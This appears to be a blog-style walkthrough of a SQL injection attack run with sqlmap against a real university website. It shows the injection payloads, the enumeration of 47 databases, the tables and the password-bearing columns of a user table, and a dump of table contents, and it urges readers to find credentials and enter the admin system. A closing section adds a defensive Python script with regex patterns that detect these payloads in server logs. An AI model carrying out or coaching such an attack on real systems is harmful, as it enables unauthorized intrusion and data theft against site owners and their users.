What SQL injection is needs no explanation here. Below is a walkthrough of one SQL injection case.
Injection points can be found by hand or with an SQL injection vulnerability scanner; here the well-known sqlmap is used on a ready-made case.
1. Probing for the vulnerability
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:16:27

[12:16:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:16:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=87'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=87' WAITFOR DELAY '0:0:5'--
---
[12:16:27] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[12:16:27] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at 12:16:27
As you can see, this site has an SQL injection point, and even the operating system, application stack and DBMS type were revealed. Next, let's explore what this database server holds.
2. Listing the databases
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 --dbs
...
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=87'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=87' WAITFOR DELAY '0:0:5'--
---
[12:16:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[12:16:59] [INFO] fetching database names
[12:16:59] [INFO] fetching number of databases
[12:16:59] [INFO] resumed: 47
[12:16:59] [INFO] resumed: BZBB_lw
[12:16:59] [INFO] resumed: ChualgXinNS
[12:16:59] [INFO] resumed: db_dike
[12:16:59] [INFO] resumed: db_dndqjzw
[12:16:59] [INFO] resumed: db_njsdjw
[12:16:59] [INFO] resumed: db_njsfsy
[12:16:59] [INFO] resumed: db_nsddlhj
[12:16:59] [INFO] resumed: db_nsdhgxn
[12:16:59] [INFO] resumed: db_nsdmba
[12:16:59] [INFO] resumed: db_nsdMediaC
[12:16:59] [INFO] resumed: db_nsdscw
[12:16:59] [INFO] resumed: db_nsdsw
[12:16:59] [INFO] resumed: db_nsdswyy
[12:16:59] [INFO] resumed: db_nsdswzy
[12:16:59] [INFO] resumed: db_nyspjc
[12:16:59] [INFO] resumed: db_sdjxjy
[12:16:59] [INFO] resumed: db_spaqjc
[12:16:59] [INFO] resumed: JiaoCai
[12:16:59] [INFO] resumed: maste@
[12:16:59] [INFO] resumed: MBA
[12:16:59] [INFO] resumed: model
[12:16:59] [INFO] resumed: msdb
[12:16:59] [INFO] resumed: njnulab
[12:16:59] [INFO] resumed: njnupj
[12:16:59] [INFO] resumed: nju
[12:16:59] [INFO] resumed: nju2222
[12:16:59] [INFO] resumed: njuold
[12:16:59] [INFO] resumed: njupj2012
[12:16:59] [INFO] resumed: Northwind
[12:16:59] [INFO] resumed: NSD_ApplicationChemical
[12:16:59] [INFO] resumed: NSD_Cnooc
[12:16:59] [INFO] resumed: NSD_ElectricalEngineering
[12:16:59] [INFO] resumed: NSD_ElectronicInformation
[12:16:59] [INFO] resumed: NSD_TeacherSkills
[12:16:59] [INFO] resumed: NSD_TeachingTeam
[12:16:59] [INFO] resumed: nsddky_sy
[12:16:59] [INFO] resumed: nsdsfjdzx
[12:16:59] [INFO] resumed: nsdsfjdzxnew
[12:16:59] [INFO] resumed: nsglxt
[12:16:59] [INFO] resumed: NSHuaKe
[12:16:59] [INFO] resumed: NSXinLiXue
[12:16:59] [INFO] resumed: NY_JG
[12:16:59] [INFO] resumed: pubs
[12:16:59] [INFO] resumed: ShangXueYuannew
[12:16:59] [INFO] resumed: tempdb
[12:16:59] [INFO] resumed: zhongxin
[12:16:59] [INFO] resumed: zhongxinold
available databases [47]:
[*] BZBB_lw
[*] ChualgXinNS
[*] db_dike
[*] db_dndqjzw
[*] db_njsdjw
[*] db_njsfsy
[*] db_nsddlhj
[*] db_nsdhgxn
[*] db_nsdmba
[*] db_nsdMediaC
[*] db_nsdscw
[*] db_nsdsw
[*] db_nsdswyy
[*] db_nsdswzy
[*] db_nyspjc
[*] db_sdjxjy
[*] db_spaqjc
[*] JiaoCai
[*] maste@
[*] MBA
[*] model
[*] msdb
[*] njnulab
[*] njnupj
[*] nju
[*] nju2222
[*] njuold
[*] njupj2012
[*] Northwind
[*] NSD_ApplicationChemical
[*] NSD_Cnooc
[*] NSD_ElectricalEngineering
[*] NSD_ElectronicInformation
[*] NSD_TeacherSkills
[*] NSD_TeachingTeam
[*] nsddky_sy
[*] nsdsfjdzx
[*] nsdsfjdzxnew
[*] nsglxt
[*] NSHuaKe
[*] NSXinLiXue
[*] NY_JG
[*] pubs
[*] ShangXueYuannew
[*] tempdb
[*] zhongxin
[*] zhongxinold

[12:16:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at 12:16:59
3. Part of the log is omitted. All the databases have been found; next we can look at the tables in a specific one.
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D JiaoCai --tables --threads 5
...
[12:18:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:18:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=87'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=87' WAITFOR DELAY '0:0:5'--
---
[12:18:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[12:18:45] [INFO] fetching tables for database: JiaoCai
[12:18:45] [INFO] fetching number of tables for database 'JiaoCai'
[12:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:18:45] [INFO] retrieved:
[12:18:46] [WARNING] reflective value(s) found and filtering out
23
[12:18:58] [INFO] retrieved: dbo.dtproperties
[12:21:19] [INFO] retrieved: dbo.sysconstraints
[12:23:12] [INFO] retrieved: dbo.syssegments
[12:24:48] [INFO] retrieved: dbo.T_BuildYxJc
[12:28:11] [INFO] retrieved: dbo.T_BuildZdJc
[12:30:01] [INFO] retrieved: dbo.T_CanYu
[12:30:44] [INFO] retrieved: dbo.T_EndDate
[12:31:44] [INFO] retrieved: dbo.T_G_BuildYxJc
[12:33:25] [INFO] retrieved: dbo.T_G_Bu
[12:34:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:34:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ildZdJc
[12:35:31] [INFO] retrieved: dbo.T_G_Ca
[12:37:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
nYu
[12:38:58] [INFO] retrieved: dbo.T_G_EndDate
[12:40:49] [INFO] retrieved: dbo.T_G_JiaoCai
[12:42:38] [INFO] retrieved: dbo.T_G_News
[12:43:17] [INFO] retrieved: dbo.T_G_User
[12:45:51] [INFO] retrieved: dbo.T_G_XueYuan
[12:47:55] [INFO] retrieved: dbo.T_G_ZhuanYe
[12:49:35] [INFO] retrieved: dbo.T_G_ZyToJc
[12:50:48] [INFO] retrieved: dbo.T_JiaoCai
[12:52:08] [INFO] retrieved: dbo.T_News
[12:53:21] [INFO] retrieved: dbo.T_U
[12:55:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ser
[12:55:55] [INFO] retrieved: dbo.T_XueYuan
[12:56:43] [INFO] retrieved: dbo.T_ZhuanYe
[12:59:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:00:05] [INFO] retrieved: dbo.T_ZyToJc
Database: JiaoCai
[23 tables]
+----------------+
| T_BuildYxJc    |
| T_BuildZdJc    |
| T_CanYu        |
| T_EndDate      |
| T_G_BuildYxJc  |
| T_G_BuildZdJc  |
| T_G_CanYu      |
| T_G_EndDate    |
| T_G_JiaoCai    |
| T_G_News       |
| T_G_User       |
| T_G_XueYuan    |
| T_G_ZhuanYe    |
| T_G_ZyToJc     |
| T_JiaoCai      |
| T_News         |
| T_User         |
| T_XueYuan      |
| T_ZhuanYe      |
| T_ZyToJc       |
| dtproperties   |
| sysconstraints |
| syssegments    |
+----------------+

[13:01:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1473 times
[13:01:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at 13:01:44
4. Find the table you are after. If you find the table that stores user and passwd, you can log into their admin system from the back end.
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew -T T_User --columns --threads 5
... HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=87'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=87' WAITFOR DELAY '0:0:5'--
---
[13:00:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[13:00:51] [INFO] fetching columns for table 'T_User' in database 'ShangXueYuannew'
[13:00:51] [INFO] retrieved:
[13:00:52] [WARNING] reflective value(s) found and filtering out
7
[13:00:55] [INFO] retrieving the length of query output
[13:00:55] [INFO] retrieved: 9
[13:01:17] [INFO] retrieved: FileTheme
[13:01:17] [INFO] retrieving the length of query output
[13:01:17] [INFO] retrieved: 7
[13:02:06] [INFO] retrieved: varchar
[13:02:06] [INFO] retrieving the length of query output
[13:02:06] [INFO] retrieved: 3
[13:02:19] [INFO] retrieved: Pwd
[13:02:19] [INFO] retrieving the length of query output
[13:02:19] [INFO] retrieved: 7
[13:03:11] [INFO] retrieved: varchar
[13:03:11] [INFO] retrieving the length of query output
[13:03:11] [INFO] retrieved: 4
[13:03:27] [INFO] retrieved: Role
[13:03:27] [INFO] retrieving the length of query output
[13:03:27] [INFO] retrieved: 7
[13:03:44] [INFO] retrieved: varchar
[13:03:44] [INFO] retrieving the length of query output
[13:03:44] [INFO] retrieved: 8
[13:04:13] [INFO] retrieved: UserFile
[13:04:13] [INFO] retrieving the length of query output
[13:04:13] [INFO] retrieved: 7
[13:04:32] [INFO] retrieved: varchar
[13:04:32] [INFO] retrieving the length of query output
[13:04:32] [INFO] retrieved: 6
[13:06:21] [INFO] retrieved: UserId
[13:06:21] [INFO] retrieving the length of query output
[13:06:21] [INFO] retrieved: 7
[13:07:14] [INFO] retrieved: varcha_ 6/7 (86%)
[13:07:46] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:07:46] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[13:08:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:09:18] [INFO] retrieved: varchar
[13:09:18] [INFO] retrieving the length of query output
[13:09:18] [INFO] retrieved: 8
[13:09:52] [INFO] retrieved: UserName
[13:09:52] [INFO] retrieving the length of query output
[13:09:52] [INFO] retrieved: 7
[13:10:36] [INFO] retrieved: va_cha_ 5/7 (71%)
[13:11:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:11:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:12:07] [INFO] retrieved: varchar
[13:12:07] [INFO] retrieving the length of query output
[13:12:07] [INFO] retrieved: 6
[13:12:35] [INFO] retrieved: UserNo
[13:12:35] [INFO] retrieving the length of query output
[13:12:35] [INFO] retrieved: 3
[13:12:46] [INFO] retrieved: int
Database: ShangXueYuannew
Table: T_User
[7 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| FileTheme | varchar |
| Pwd       | varchar |
| Role      | varchar |
| UserFile  | varchar |
| UserId    | varchar |
| UserName  | varchar |
| UserNo    | int     |
+-----------+---------+

[13:12:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 727 times
[13:12:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at 13:12:46
5. You can even download the database you want and study it locally at your leisure.
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew --dump --threads 5
This takes quite a long time; once it finishes you can see the actual contents of the database.
Database: ShangXueYuannew
Table: T_Acceptance
[10 entries]
+------+-----+------------+------------+------------+------------+------------------------------------------------+--------+
| aId  | aNo | aRar       | aPdf       | aWord      | aFlash     | aTitle                                         | aState |
+------+-----+------------+------------+------------+------------+------------------------------------------------+--------+
| NULL | 1   | 969655.rar | NULL       | NULL       | NULL       | NULL                                           | -502   |
| 0    | 11  | NULL       | 481991.pdf | 481991.doc | 159067.swf | 江蘇省高等學校實驗教學示范中心2011年驗收申請表 | -501   |
| 0    | 12  | NULL       | 520703.pdf | 520703.doc | 520703.swf | 江蘇省高等學校基礎課實驗教學示范中心立項申報表 | -501   |
| 0    | 13  | NULL       | 771297.pdf | 771297.doc | 448373.swf | 支撐材料之一:經濟管理教學實驗中心整體介紹     | -501   |
| 0    | 14  | NULL       | 493219.pdf | 349602.doc | 493219.swf | 支撐材料之二:實驗室相關政策措施及規章制度     | -501   |
| 0    | 15  | NULL       | 882516.pdf | 559592.doc | 559592.swf | 支撐材料之三:課程實驗教學計划及實驗項目       | -501   |
| 0    | 16  | NULL       | 783892.pdf | 917744.doc | 138044.swf | 支撐材料之四:典型自編課程實驗講義             | -501   |
| 0    | 17  | NULL       | 332145.pdf | 593306.doc | 332145.swf | 支撐材料之五:典型多媒體課件簡介               | -501   |
| 0    | 18  | NULL       | 811424.pdf | 811424.doc | 811424.swf | 支撐材料之߸ߢ經濟ߢ理教學實驗中心建設成果       | -501   |
| NULL | 2   | 241811.rar | NULL       | NULL       | NULL       | NULL                                           | -503   |
+------+-----+------------+------------+------------+------------+------------------------------------------------+--------+
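From the defender's side, the whole enumeration above leaves an unmistakable trace in the web server's access log: the three payload shapes sqlmap reported (a boolean tautology, a stacked query, and a WAITFOR DELAY time probe) and the burst of HTTP 500 responses (1473 in the table listing alone). The script below is an added example, not part of the original post; it runs over constructed IIS-style log lines (the field layout, client addresses and timestamps are assumptions) and flags clients by payload signature and 500-error count.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS (W3C) style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2013-05-12 12:16:27 203.0.113.7 GET /fjlist.asp id=87 200
2013-05-12 12:16:27 203.0.113.7 GET /fjlist.asp id=87'+AND+8841%3D8841+AND+'bZbc'%3D'bZbc 200
2013-05-12 12:16:28 203.0.113.7 GET /fjlist.asp id=87';+WAITFOR+DELAY+'0:0:5'-- 500
2013-05-12 12:16:33 203.0.113.7 GET /fjlist.asp id=87'+WAITFOR+DELAY+'0:0:5'-- 500
2013-05-12 12:16:40 198.51.100.2 GET /fjlist.asp id=88 200
"""

# One signature per technique class sqlmap reported on this page.
SIGNATURES = {
    # quote, AND/OR, then a number compared with itself: the boolean-blind tautology
    "boolean_blind": re.compile(r"'\s*(and|or)\s+(\d+)\s*=\s*\2\b", re.I),
    # a statement terminator followed by a new statement: stacked queries
    "stacked_query": re.compile(r";\s*(waitfor|exec|select|insert|update|delete|drop)\b", re.I),
    # the MSSQL time-based probe
    "time_blind": re.compile(r"\bwaitfor\s+delay\s+'", re.I),
}


def classify_query(raw_query):
    """Return the technique labels whose signature matches the URL-decoded query string."""
    decoded = unquote_plus(raw_query)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def analyse(log_text, error_threshold=2):
    """Per-client findings: techniques seen, matching requests, and HTTP 500 count.

    A client is reported when any signature matched or its 500 count reached
    error_threshold; blind enumeration produces long runs of such errors.
    """
    findings = defaultdict(lambda: {"techniques": set(), "hits": 0, "errors": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # header, comment or malformed line
        _, _, client, _, _, query, status = parts
        entry = findings[client]
        techniques = classify_query(query)
        entry["techniques"] |= techniques
        entry["hits"] += 1 if techniques else 0
        if status == "500":
            entry["errors"] += 1
    return {ip: f for ip, f in findings.items()
            if f["techniques"] or f["errors"] >= error_threshold}
```

On the sample above only 203.0.113.7 is reported, with all three technique classes and two 500s; the client that merely requested id=88 is not.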